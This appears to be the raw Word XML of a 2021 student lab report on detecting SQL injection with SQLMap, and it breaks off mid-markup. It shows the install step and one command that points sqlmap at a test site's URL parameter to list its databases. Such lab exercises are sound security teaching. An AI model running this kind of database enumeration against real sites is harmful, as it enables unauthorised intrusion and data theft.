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F0F7" w14:textId="77777777" w:rsidR="00CC65F1" w:rsidRPr="00BF31B1" w:rsidRDefault="00CC65F1" w:rsidP="00CC65F1">
      <w:pPr>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="795F2804" w14:textId="77777777" w:rsidR="00CC65F1" w:rsidRPr="00BF31B1" w:rsidRDefault="00CC65F1" w:rsidP="00CC65F1">
      <w:pPr>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs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>Don Bosco Institute of Technology</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="528F1E0F" w14:textId="77777777" w:rsidR="00CC65F1" w:rsidRPr="00BF31B1" w:rsidRDefault="00CC65F1" w:rsidP="00CC65F1">
      <w:pPr>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs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 xml:space="preserve">  Department of Computer Engineering</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="578101FC" w14:textId="77777777" w:rsidR="00CC65F1" w:rsidRPr="00BF31B1" w:rsidRDefault="00CC65F1" w:rsidP="00CC65F1">
      <w:pPr>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0B3606E7" w14:textId="77777777" w:rsidR="00CC65F1" w:rsidRPr="00BF31B1" w:rsidRDefault="00CC65F1" w:rsidP="00CC65F1">
      <w:pPr>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="32B3840A" w14:textId="77777777" w:rsidR="00CC65F1" w:rsidRPr="00BF31B1" w:rsidRDefault="00CC65F1" w:rsidP="00CC65F1">
      <w:pPr>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs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>Academic year – 2021-22</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2BDD4F59" w14:textId="77777777" w:rsidR="00CC65F1" w:rsidRPr="00BF31B1" w:rsidRDefault="00CC65F1" w:rsidP="00CC65F1">
      <w:pPr>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6439C965" w14:textId="77777777" w:rsidR="00CC65F1" w:rsidRPr="00BF31B1" w:rsidRDefault="00CC65F1" w:rsidP="00CC65F1">
      <w:pPr>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:u w:val="single"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="17F00D26" w14:textId="77777777" w:rsidR="00CC65F1" w:rsidRPr="00BF31B1" w:rsidRDefault="00CC65F1" w:rsidP="00CC65F1">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6F351C08" w14:textId="77777777" w:rsidR="00CC65F1" w:rsidRPr="00BF31B1" w:rsidRDefault="00CC65F1" w:rsidP="00CC65F1">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="638145B5" w14:textId="77777777" w:rsidR="00CC65F1" w:rsidRPr="00BF31B1" w:rsidRDefault="00CC65F1" w:rsidP="00CC65F1">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:u w:val="single"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00BF31B1">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">Class: </w:t>
      </w:r>
      <w:r w:rsidRPr="00BF31B1">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>B.E. COMPUTER ENGINEERING</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="715C12AF" w14:textId="77777777" w:rsidR="00CC65F1" w:rsidRPr="00BF31B1" w:rsidRDefault="00CC65F1" w:rsidP="00CC65F1">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:u w:val="single"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7445ACEC" w14:textId="77777777" w:rsidR="00CC65F1" w:rsidRPr="00BF31B1" w:rsidRDefault="00CC65F1" w:rsidP="00CC65F1">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"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 xml:space="preserve">Subject: </w:t>
      </w:r>
      <w:r w:rsidRPr="00BF31B1">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>Computational Lab -I</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3007C28F" w14:textId="77777777" w:rsidR="00CC65F1" w:rsidRPr="00BF31B1" w:rsidRDefault="00CC65F1" w:rsidP="00CC65F1">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="34BFC649" w14:textId="77777777" w:rsidR="00CC65F1" w:rsidRPr="00BF31B1" w:rsidRDefault="00CC65F1" w:rsidP="00CC65F1">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:u w:val="single"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00BF31B1">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>Course Code:</w:t>
      </w:r>
      <w:r w:rsidRPr="00BF31B1">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve"> CSL704</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3C26AC4C" w14:textId="77777777" w:rsidR="00CC65F1" w:rsidRPr="00BF31B1" w:rsidRDefault="00CC65F1" w:rsidP="00CC65F1">
      <w:pPr>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:u w:val="single"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="32ACA7EB" w14:textId="708C796B" w:rsidR="00CC65F1" w:rsidRPr="00BF31B1" w:rsidRDefault="00CC65F1" w:rsidP="00CC65F1">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"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 xml:space="preserve">Experiment Title: </w:t>
      </w:r>
      <w:r w:rsidRPr="00BF31B1">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">EXPERIMENT </w:t>
      </w:r>
      <w:r w:rsidR="007568F0" w:rsidRPr="00BF31B1">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>5</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="24B2A0B7" w14:textId="77777777" w:rsidR="00CC65F1" w:rsidRPr="00BF31B1" w:rsidRDefault="00CC65F1" w:rsidP="00CC65F1">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="73CC44C0" w14:textId="77777777" w:rsidR="00CC65F1" w:rsidRPr="00BF31B1" w:rsidRDefault="00CC65F1" w:rsidP="00CC65F1">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"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>Student Name: Hayden Cordeiro</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7E766365" w14:textId="77777777" w:rsidR="00CC65F1" w:rsidRPr="00BF31B1" w:rsidRDefault="00CC65F1" w:rsidP="00CC65F1">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1ED01E64" w14:textId="77777777" w:rsidR="00CC65F1" w:rsidRPr="00BF31B1" w:rsidRDefault="00CC65F1" w:rsidP="00CC65F1">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"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>Roll No.:05</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="312AB02E" w14:textId="77777777" w:rsidR="00CC65F1" w:rsidRPr="00BF31B1" w:rsidRDefault="00CC65F1" w:rsidP="00CC65F1">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4DB5A3FC" w14:textId="77777777" w:rsidR="00CC65F1" w:rsidRPr="00BF31B1" w:rsidRDefault="00CC65F1" w:rsidP="00CC65F1">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"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 xml:space="preserve">Batch: </w:t>
      </w:r>
      <w:r w:rsidRPr="00BF31B1">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>D</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4C60DB21" w14:textId="77777777" w:rsidR="00CC65F1" w:rsidRPr="00BF31B1" w:rsidRDefault="00CC65F1" w:rsidP="00CC65F1">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3AC35FFF" w14:textId="01FDA333" w:rsidR="00CC65F1" w:rsidRPr="00BF31B1" w:rsidRDefault="00CC65F1" w:rsidP="00CC65F1">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"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 xml:space="preserve">Date of Performance: </w:t>
      </w:r>
      <w:r w:rsidR="00DD7E95">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>3</w:t>
      </w:r>
      <w:r w:rsidR="005A28EF">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>1</w:t>
      </w:r>
      <w:r w:rsidRPr="00BF31B1">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>-08-2021</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="74469FC3" w14:textId="77777777" w:rsidR="00CC65F1" w:rsidRPr="00BF31B1" w:rsidRDefault="00CC65F1" w:rsidP="00CC65F1">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="546BEBC8" w14:textId="19336F3C" w:rsidR="00CC65F1" w:rsidRPr="00BF31B1" w:rsidRDefault="00CC65F1" w:rsidP="00CC65F1">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"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 xml:space="preserve">Date of Submission: </w:t>
      </w:r>
      <w:r w:rsidR="006A1CB1" w:rsidRPr="00BF31B1">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>02</w:t>
      </w:r>
      <w:r w:rsidRPr="00BF31B1">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>-0</w:t>
      </w:r>
      <w:r w:rsidR="006A1CB1" w:rsidRPr="00BF31B1">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>9</w:t>
      </w:r>
      <w:r w:rsidRPr="00BF31B1">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>-2021</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="65C5B6CF" w14:textId="2F968518" w:rsidR="00BE70A2" w:rsidRPr="00BF31B1" w:rsidRDefault="00BE70A2">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="10722612" w14:textId="062B3E35" w:rsidR="004B5CD9" w:rsidRPr="00BF31B1" w:rsidRDefault="004B5CD9">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="43FE3D89" w14:textId="796871CA" w:rsidR="004B5CD9" w:rsidRPr="00BF31B1" w:rsidRDefault="004B5CD9">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="36E24B05" w14:textId="191439B1" w:rsidR="00782299" w:rsidRPr="00BF31B1" w:rsidRDefault="00782299">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="37F60B2D" w14:textId="751788F3" w:rsidR="001F7606" w:rsidRPr="00BF31B1" w:rsidRDefault="001F7606">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="22EDB6AF" w14:textId="14861A57" w:rsidR="001F7606" w:rsidRPr="00BF31B1" w:rsidRDefault="001F7606">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="77AD2902" w14:textId="490B34C7" w:rsidR="001F7606" w:rsidRPr="00BF31B1" w:rsidRDefault="001F7606">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4DF4844B" w14:textId="38840E75" w:rsidR="001F7606" w:rsidRPr="00BF31B1" w:rsidRDefault="001F7606">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3D2B76D8" w14:textId="477B1C3A" w:rsidR="001F7606" w:rsidRPr="00BF31B1" w:rsidRDefault="001F7606">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="58F6BC27" w14:textId="0C9D1144" w:rsidR="001F7606" w:rsidRPr="00BF31B1" w:rsidRDefault="001F7606">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="00AC232A" w14:textId="66CDC458" w:rsidR="001F7606" w:rsidRPr="00BF31B1" w:rsidRDefault="001F7606">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7EF245BF" w14:textId="2F6ABDA1" w:rsidR="001F7606" w:rsidRPr="00BF31B1" w:rsidRDefault="001F7606">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2CF98C1A" w14:textId="7C808746" w:rsidR="001F7606" w:rsidRPr="00BF31B1" w:rsidRDefault="001F7606">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="69D293B8" w14:textId="4E79ED75" w:rsidR="001F7606" w:rsidRPr="00BF31B1" w:rsidRDefault="001F7606">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="369785C2" w14:textId="6DF33EA9" w:rsidR="001F7606" w:rsidRPr="00BF31B1" w:rsidRDefault="001F7606">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="27B7DBC6" w14:textId="5376F081" w:rsidR="001F7606" w:rsidRPr="00BF31B1" w:rsidRDefault="001F7606">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="14F559D6" w14:textId="77F2B89A" w:rsidR="001F7606" w:rsidRPr="00BF31B1" w:rsidRDefault="001F7606">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"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>Aim</w:t>
      </w:r>
      <w:r w:rsidRPr="00BF31B1">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
      <w:r w:rsidR="003F1ECA" w:rsidRPr="00BF31B1">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="003F1ECA" w:rsidRPr="00BF31B1">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>Detect SQL injection vulnerabilities in a website database using SQLMap</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="694FE7E2" w14:textId="77777777" w:rsidR="00216A08" w:rsidRPr="00BF31B1" w:rsidRDefault="00216A08">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="03AB1355" w14:textId="57BF84A1" w:rsidR="00B77C4A" w:rsidRPr="00BF31B1" w:rsidRDefault="0061204B">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs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>Installation</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="681AA99C" w14:textId="624D22B0" w:rsidR="00B77C4A" w:rsidRPr="00BF31B1" w:rsidRDefault="00AA7B27">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00BF31B1">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>$ sudo apt-get install sqlmap</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4438B5A5" w14:textId="77777777" w:rsidR="00AA7B27" w:rsidRPr="00BF31B1" w:rsidRDefault="00AA7B27">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5F61BF2B" w14:textId="0D58F115" w:rsidR="00B77C4A" w:rsidRPr="00BF31B1" w:rsidRDefault="0061204B">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00BF31B1">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:noProof/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="28257265" wp14:editId="0ADB8042">
            <wp:extent cx="5943600" cy="384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2789" w14:textId="10C3A0D8" w:rsidR="00B77C4A" w:rsidRPr="00BF31B1" w:rsidRDefault="00B77C4A">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3BFE2B6D" w14:textId="20D4CDD7" w:rsidR="00B77C4A" w:rsidRPr="00BF31B1" w:rsidRDefault="00B77C4A">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1EE97165" w14:textId="7CB003AF" w:rsidR="00B77C4A" w:rsidRPr="00BF31B1" w:rsidRDefault="00B77C4A">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="078A422B" w14:textId="21D42CA9" w:rsidR="00B77C4A" w:rsidRPr="00BF31B1" w:rsidRDefault="00B77C4A">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="63C20A36" w14:textId="260EAA03" w:rsidR="0061204B" w:rsidRPr="00BF31B1" w:rsidRDefault="0061204B">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1B9CFA40" w14:textId="325C06F9" w:rsidR="0061204B" w:rsidRPr="00BF31B1" w:rsidRDefault="0061204B">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs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>List information about the existing databases</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0F845933" w14:textId="4DC6FAB8" w:rsidR="007D4E55" w:rsidRPr="00BF31B1" w:rsidRDefault="007D4E55">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00BF31B1">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>$ sqlmap -u http://testphp.vulnweb.com/listproducts.php?cat=1 --dbs</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="06E73B72" w14:textId="1A0A61BA" w:rsidR="00B77C4A" w:rsidRPr="00BF31B1" w:rsidRDefault="00530A2A">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00BF31B1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76CD980" wp14:editId="76EF5CF3">
            <wp:extent cx="5943600" cy="2894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1B1">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:noProof/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="1B53E853" wp14:editId="33896FEC">
            <wp:extent cx="5943600" cy="3379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4536" w14:textId="3417EA7B" w:rsidR="00B77C4A" w:rsidRPr="00BF31B1" w:rsidRDefault="00B77C4A">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="148B3D90" w14:textId="3CC57EBA" w:rsidR="00B77C4A" w:rsidRPr="00BF31B1" w:rsidRDefault="00B77C4A">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7F9B6EFF" w14:textId="08FE2D24" w:rsidR="00B77C4A" w:rsidRPr="00BF31B1" w:rsidRDefault="00B77C4A">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1A168556" w14:textId="6D06041D" w:rsidR="00B77C4A" w:rsidRPr="00BF31B1" w:rsidRDefault="00B77C4A">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1AD8BE81" w14:textId="401C87A5" w:rsidR="00B77C4A" w:rsidRPr="00BF31B1" w:rsidRDefault="00B77C4A">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="218CA4C7" w14:textId="5F1AA229" w:rsidR="00970311" w:rsidRPr="00BF31B1" w:rsidRDefault="00970311">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1BCBE3C0" w14:textId="77ED02F4" w:rsidR="00970311" w:rsidRPr="00BF31B1" w:rsidRDefault="00970311">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5A975269" w14:textId="7A416513" w:rsidR="00970311" w:rsidRPr="00BF31B1" w:rsidRDefault="00970311">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="39CF8F6D" w14:textId="6A9ADB6A" w:rsidR="00970311" w:rsidRPr="00BF31B1" w:rsidRDefault="00970311">
      <w:pPr>
        <w:rPr>
